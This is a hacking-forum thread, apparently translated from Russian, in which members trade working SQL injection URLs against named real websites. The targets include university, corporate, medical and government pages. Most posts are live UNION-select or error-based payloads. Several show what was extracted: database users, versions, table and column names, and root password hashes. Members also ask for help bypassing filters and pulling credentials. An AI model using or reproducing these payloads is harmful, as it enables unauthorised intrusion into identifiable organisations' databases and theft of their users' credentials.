SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Shram-spb

    Here you go, signed and delivered :)

    Code:
    http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,3,4,concat_ws(char(58),username,password,salt,email,icq,skype)+from+vbuser/*
     
  2. Shram-spb

    Here's the password :)

    Code:
    http://www.buybrand.ru/rus/index/news?id=-1%20union%20select%201,2,name,4,5,passw,7,8+from%20users/*
     
  3. md5f1h

    The first two are related to la2
    http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/*
    http://www.akatsuki.asturservers.com/open-L2DP/item.php?id=-1+Union+select+1,2,3,TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+LIMIT+2,1/*
    http://www.books.bg/Item.php?id=-1+union+select+user()/*
     
  4. The_HuliGun

    Code:
    http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,concat_ws(0x203a20,user,password),3,4,5+from+mysql.user/*
    
    root : 1be122933e65c0f2
    ;-)
     
  5. Y.Dmitriy

    I can't work out the rest... whoever can, I owe you ++ (really need it)...
     
  6. ice1k

    Well then
    http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,concat(login_user,0x3a,password_user),8,9,10+from+user/*
     
  7. V1p-eR

    Code:
    http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
    [email protected]:bugs:5.0.18-log
    Code:
    http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,db),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.db/*
    there is a database; asystem
    Code:
    http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
    root:*97EB633C4A82BD6AE86EB0CA129D2CD0CBF93228
     
  8. Серенький

    sql

    (passwords are md5 (unix))
     
  9. Y.Dmitriy

    PASSWORDS ARE IN MD5
    Logins, but for some reason the page doesn't respond :(
     
  10. Shram-spb

    Couldn't work out the tables :(
    Code:
    http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
     
  11. banned

    Y.Dmitriy, use limit and everything will open
    Code:
    http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,login,9,10+from+users+limit+2,1/*
     
  12. Shram-spb

    Code:
    http://kipelov.ru/ly.php?idtxt=-1+union+select+2,3,4/*
    :))
     
  13. anakreon

    Harvard's site...
    Code:
    http://www.law.harvard.edu/faculty/directory/facdir.php?id=20+union+select+user(),database()/*
    facdir@localhost: academics
     
    #2673 anakreon, 10 Jul 2007
    Last edited: 10 Jul 2007
  14. Y.Dmitriy

    SITE OF THE STATE TAX ADMINISTRATION OF UKRAINE
    !!!!DAMN, I HATE IT!!!
     
  15. helat

    If only there were the password too.
    Super
     
  16. z01b

    http://asun.unl.edu/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15/*
    there, I worked out the columns!
     
    #2676 z01b, 10 Jul 2007
    Last edited: 10 Jul 2007
  17. Shram-spb

    http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12+from+information_schema.columns/*/
     
  18. Dr.Frank

    http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/*
    http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/*

    P.S.:
    how can this be bypassed:
    Code:
    http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*
     
  19. Dr.Frank

    MsSql:

    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@version--
    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+db_name())--
    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+system_user)--

    Tables:
    D99_Tmp
    Category
    D99_CMD
    Dic_BodyPart
    Dic_HX
    Dic_Language
    Dic_State
    Dic_Test
    dtproperties
    ip
    Message
    Rights
    Role
    SessionAction
    SessionLog
    Siwebtmp
    Subscriber
    sysconstraints
    syssegments
    systables
    User
    v_Category
    v_Rights
    v_SessionActions

    Found all the columns in the User table:
    ID
    RoleRef
    System
    Name
    Password
    FirstName
    LastName
    EMail

    The last one didn't work:
    Code:
    http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)--
    How can this be done?
     
    #2679 Dr.Frank, 11 Jul 2007
    Last edited: 11 Jul 2007
  20. a1ex

    Code:
    http://www.ofmusic.ru/mat/index.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.columns/*&mid=796
     